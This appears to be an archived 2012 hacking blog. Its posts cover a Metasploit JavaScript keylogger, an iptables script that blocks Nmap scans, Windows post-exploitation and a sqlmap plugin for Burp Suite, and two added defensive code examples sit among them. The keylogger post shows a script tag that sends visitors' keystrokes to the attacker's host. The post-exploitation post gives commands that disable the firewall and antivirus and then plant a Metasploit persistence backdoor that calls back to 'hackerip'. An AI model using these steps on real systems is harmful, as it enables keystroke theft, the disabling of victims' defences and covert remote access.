Feb 23, 2012

Keylogging with Metasploit & Javascript

For details, see the Source.

Step 1: Module setup:

msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options


Module options (auxiliary/server/capture/http_javascript_keylogger):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


msf  auxiliary(http_javascript_keylogger) > run


[*] Using URL: http://0.0.0.0:8080/qZBRzd
[*]  Local IP: http://192.168.1.131:8080/qZBRzd
[*] Server started.


Step 2: Demo page URL
Step 3 (Optional): To embed the keylogger into any web page, use an HTML <script> tag whose src is a URL the browser can reach, with "/[whatever].js" appended.

<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js"></script>

Screen Capture 1: Module setup and run
Screen Capture 2: Demo page
Screen Capture 3: Keystrokes captured and stored to loot





Source: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger
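
A defender's check for the embedding described in Step 3, as an added example that is not part of the original post or of the Metasploit module: it lists the script sources in a page that load from an origin outside an allowlist. The page URL, the allowlist and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def origin(url):
    """scheme://host[:port] of an absolute URL, lower-cased for comparison."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def unexpected_scripts(html, page_url, allowed_origins):
    """Absolute URLs of scripts loaded from outside the page's own origin
    and outside the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    allowed = {o.lower() for o in allowed_origins} | {origin(page_url)}
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and //host forms
        if origin(absolute) not in allowed:
            findings.append(absolute)
    return findings


# Constructed sample page: two expected scripts plus the tag from Step 3.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js"></script>
</head><body><form><input name="user"></form></body></html>"""

if __name__ == "__main__":
    for url in unexpected_scripts(SAMPLE_HTML, "https://intranet.example.com/login",
                                  ["https://cdn.example.com"]):
        print("unexpected script source:", url)
```

The same allowlist expressed as a Content-Security-Policy `script-src` directive would make the browser refuse to load the third tag at all.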

If you like my blog, Please Donate Me

Feb 22, 2012

IPTABLES Shell Script to Block NMAP

#!/bin/bash
# To run this file, first give the permission +x and execute this program
# --# chmod +x blocknmap.sh
# --# ./blocknmap.sh

echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1"
echo "3                                                                      3"
echo "3     ________   .__          ________                                 3"
echo "7     \______ \  |__|  ______/   __   \     ____    ____    _____      7"
echo "1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1"
echo "3      |        \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3"
echo "3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3"
echo "7             \/          \/            \/     \/               \/     7"
echo "1                                                                      1"
echo "3              >> The Underground Exploitation Team                    3"
echo "3                                                                      3"
echo "7                                                                      7"
echo "1          [+] Site   : http://www.Dis9.com                            1"
echo "3                                                                      3"
echo "3                                                                      3"
echo "7            ###############################################           7"
echo "1            I'm Liyan Oz Leader of Underground Exploitation           1"
echo "3            ###############################################           3"
echo "3                                                                      3"                                           
echo "7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7"
echo "========================================================================"
echo "=                  Block Nmap Scanning using iptables                  ="
echo "=                         C0ded by Liyan Oz                            ="
echo "=                      http://0nto.wordpress.com                       ="
echo "========================================================================"   
echo ""
echo ""
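#=====================
# Enable IP Forward
# (kernel routing between interfaces; the rules below only filter the INPUT chain)
#---------------------

echo 1 > /proc/sys/net/ipv4/ip_forward

#=====================
# Flush all rules
# (removes every existing rule in the filter and nat tables)
#---------------------
/sbin/iptables -F
/sbin/iptables -t nat -F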

#=====================
# Block
#---------------------

/sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "FIN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j LOG --log-prefix "PSH: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j LOG --log-prefix "URG: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j LOG --log-prefix "XMAS scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j LOG --log-prefix "NULL scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LOG --log-prefix "pscan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j LOG --log-prefix "SYNFIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j LOG --log-prefix "NMAP-XMAS-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j LOG --log-prefix "FIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j LOG --log-prefix "NMAP-ID: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-prefix "SYN-RST: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
 
Source: http://packetstormsecurity.org/files/110042/blocknmap.sh.txt
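
Because iptables evaluates rules in order and each LOG above is paired with a DROP, the order of the `--tcp-flags` rules decides which log prefix a packet produces. The following added example (not part of blocknmap.sh) models only those flag rules, assuming the packet was not already handled by the state rules at the top of the script, and reports which prefixes can never appear in the log.

```python
from itertools import combinations

FLAGS = {"FIN", "SYN", "RST", "PSH", "ACK", "URG"}

# (mask, comp, log prefix) for each --tcp-flags rule, in the script's order.
RULES = [
    ("ACK,FIN", "FIN", "FIN: "),
    ("ACK,PSH", "PSH", "PSH: "),
    ("ACK,URG", "URG", "URG: "),
    ("ALL", "ALL", "XMAS scan: "),
    ("ALL", "NONE", "NULL scan: "),
    ("ALL", "SYN,RST,ACK,FIN,URG", "pscan: "),
    ("SYN,FIN", "SYN,FIN", "pscan 2: "),
    ("FIN,RST", "FIN,RST", "pscan 2: "),
    ("ALL", "SYN,FIN", "SYNFIN-SCAN: "),
    ("ALL", "URG,PSH,FIN", "NMAP-XMAS-SCAN: "),
    ("ALL", "FIN", "FIN-SCAN: "),
    ("ALL", "URG,PSH,SYN,FIN", "NMAP-ID: "),
    ("SYN,RST", "SYN,RST", "SYN-RST: "),
]

def parse(spec):
    if spec in ("ALL", "NONE"):
        return set(FLAGS) if spec == "ALL" else set()
    return set(spec.split(","))

def matches(packet_flags, mask, comp):
    # --tcp-flags mask comp: of the flags in mask, exactly those in comp are set.
    return packet_flags & parse(mask) == parse(comp)

def first_prefix(packet_flags):
    """Log prefix of the first rule that matches, or None if none does."""
    for mask, comp, prefix in RULES:
        if matches(packet_flags, mask, comp):
            return prefix  # first match decides: its paired DROP stops evaluation
    return None

def shadowed_rules():
    """Prefixes of rules whose every matching packet is caught by an earlier rule."""
    every_packet = [set(c) for n in range(len(FLAGS) + 1)
                    for c in combinations(sorted(FLAGS), n)]
    shadowed = []
    for i, (mask, comp, prefix) in enumerate(RULES):
        hits = [p for p in every_packet if matches(p, mask, comp)]
        if all(any(matches(p, m, c) for m, c, _ in RULES[:i]) for p in hits):
            shadowed.append(prefix)
    return shadowed
```

For the order used in the script, `shadowed_rules()` reports SYNFIN-SCAN, NMAP-XMAS-SCAN, FIN-SCAN and NMAP-ID: the first rule (FIN set, ACK clear) already matches those packets, so they appear in the log under the "FIN: " prefix.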



Feb 21, 2012

Post Exploitation To Manage Firewall And Antivirus

Firewall
1. Show Firewall Operation Mode
> netsh firewall show opmode

C:\Documents and Settings\Administrator>netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Disable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable



2. To disable the firewall, use this command:
> netsh firewall set opmode disable


Antivirus
1. To find the antivirus in the task list, use this command (in this step, we look for "AVG Antivirus"):
> tasklist /SVC | find /I 'avg'


2. To query information about the task, use:
> sc queryex taskname


3. To disable startup of the task, use:
> sc config taskname start=DISABLED

After that, you can inject the backdoor into the machine :)
If you use Metasploit, try this command:
run persistance -A -L c:\\ -X -i 10 -p 443 -r  hackerip
 







SQLMap plugin for Burpsuite [Add plugin for windows]

For details, and to see who developed this plugin, please go to the Source.

1. First, download the plugin:
https://gason.googlecode.com/files/burpplugins.jar

2. Run Burp Suite with the plugin:
$ java -classpath burpplugins.jar:"BurpSuite_v1.4.01.jar" burp.StartBurp

3. Right-click the URL you want to test with sqlmap and choose "Send to sqlmap".

4. Configure the sqlmap options and click "Run".


Update SQLMap Plugin for Windows: http://www.praetorian.com/blog/burp-sqlmap-plugin-for-windows
Source: http://blog.buguroo.com/?p=2471&lang=en
